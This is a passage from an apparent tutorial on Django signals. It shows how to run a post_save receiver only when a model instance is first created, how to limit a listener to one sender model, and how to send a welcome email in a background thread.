    if 'created' in kwargs:
        if kwargs['created']:
            pass  # Send email

First, we test that a `created` argument was passed in. If it was, we verify that its value is True.
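The two nested tests can be folded into one with dict.get(), which returns None when the key is missing. A small sketch for Python 3 follows; the return values are there only so the behaviour is easy to observe and are not something Django requires of a receiver.

```python
def send_welcome_email(sender, instance, signal, *args, **kwargs):
    # .get() returns None when 'created' is absent, so one test covers both cases.
    if kwargs.get('created'):
        return 'welcome sent to %s' % instance   # placeholder for sending the email
    return None

print(send_welcome_email(None, 'alice', None, created=True))
```

A call without the flag, or with created=False, falls through without sending anything.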

Finally, set up a listener as usual. Again, where you put it matters not as long as it gets executed before the signal gets sent; models.py is a good place.

# myapp/models.py
from django.dispatch import dispatcher
from django.db.models import signals
...
dispatcher.connect(send_welcome_email, signal=signals.post_save, sender=UserProfile)

The `sender` argument limits the listener to signals sent by that particular model. I chose to send the email upon the creation of UserProfile, the profile model associated with User in my app. If you left this part out, our send_welcome_email function would be called every time any model in your application was saved, which would obviously not be desirable.

And, just like that, you get code that will only execute when the model is first created.

Handling Signals Asynchronously

Both of the above examples send emails. It normally doesn’t take much time to send an email, but if the server load is heavy, it could take longer than normal. Ideally, anytime you do anything like this, you want it to be done asynchronously so that users don’t have to wait for the processing to finish before they can move on to something else.

Django’s signals provide half the functionality by decoupling the code for sending the email from the view. However, by default, Django’s signals are synchronous; the signal gets sent and the application waits for its successful completion before moving on. Thankfully, Python has the answer in its threading module.

A thread, extremely simplified, can be thought of as a branch of a running program (Django in this case). It becomes its own entity, able to run independently of its parent process. Extremely simplified, again, you could think of it as a little mini-Django tasked with a very specific and finite purpose. Once it completes its function, it goes away. This purchases us the ability to let something run, while still continuing on in our application in general.

While it sounds rather complicated, it’s actually relatively easy to set up. The following is the actual code I’m using for the welcome email discussed earlier:

import threading
...
class WelcomeEmailThread(threading.Thread):
    def __init__(self, instance):
        self.instance = instance
        threading.Thread.__init__(self)

    def run(self):
        # The actual code we want to run, i.e. sending the email
        pass

def send_welcome_email(sender, instance, signal, *args, **kwargs):
    if 'created' in kwargs:
        if kwargs['created']:
            WelcomeEmailThread(instance).start()

First, we create a new class which subclasses threading.Thread. The name of the class is inconsequential; just pick something descriptive. In this class, we have two functions defined: `__init__` and `run`.

The `__init__` function is provided to allow us to pass in the instance we received from the signal. We store the instance as an attribute so it can be retrieved later, and then we call the `__init__` method on threading.Thread. This is necessary because we have overridden (replaced) the `__init__` function inherited from threading.Thread without reproducing what it does, so the base class still needs to complete its normal initialization.

The `run` function is the heart of the class. This is where the email sending will now occur.

Finally, in the `send_welcome_email` function, which previously housed the code for sending the email, we now start the thread instead. The `if` statements are just specifying that this code should only run if the object is being created instead of updated (see previous topic).

That’s all that’s required. Now, when the signal is received it will simply spawn off a thread to send the email and return processing back to the rest of our application. Not bad at all.
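When the thread has nothing to remember beyond its arguments, the subclass can be skipped by handing threading.Thread a target function. The sketch below is for Python 3 and uses stand-ins: deliver_welcome_email and the sent list are made up for illustration, and the join() call is there only so the demo can inspect the result.

```python
import threading

sent = []  # stands in for the mail server in this sketch

def deliver_welcome_email(address):
    # Placeholder for the slow work (rendering and sending the message).
    sent.append(address)

def send_welcome_email(sender, instance, signal, *args, **kwargs):
    if kwargs.get('created'):
        worker = threading.Thread(target=deliver_welcome_email, args=(instance,))
        worker.start()
        return worker   # returned only so the caller can join() in this demo
    return None

worker = send_welcome_email(None, 'alice@example.com', None, created=True)
worker.join()           # wait here so the result can be inspected
print(sent)             # ['alice@example.com']
```

In the signal handler itself you would normally start the thread and return straight away, as in the class-based version above.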

Wrap Up

That’s all I’ve got for now, but I think it covers the three most confusing areas of Django’s signals. Happy Django’ing.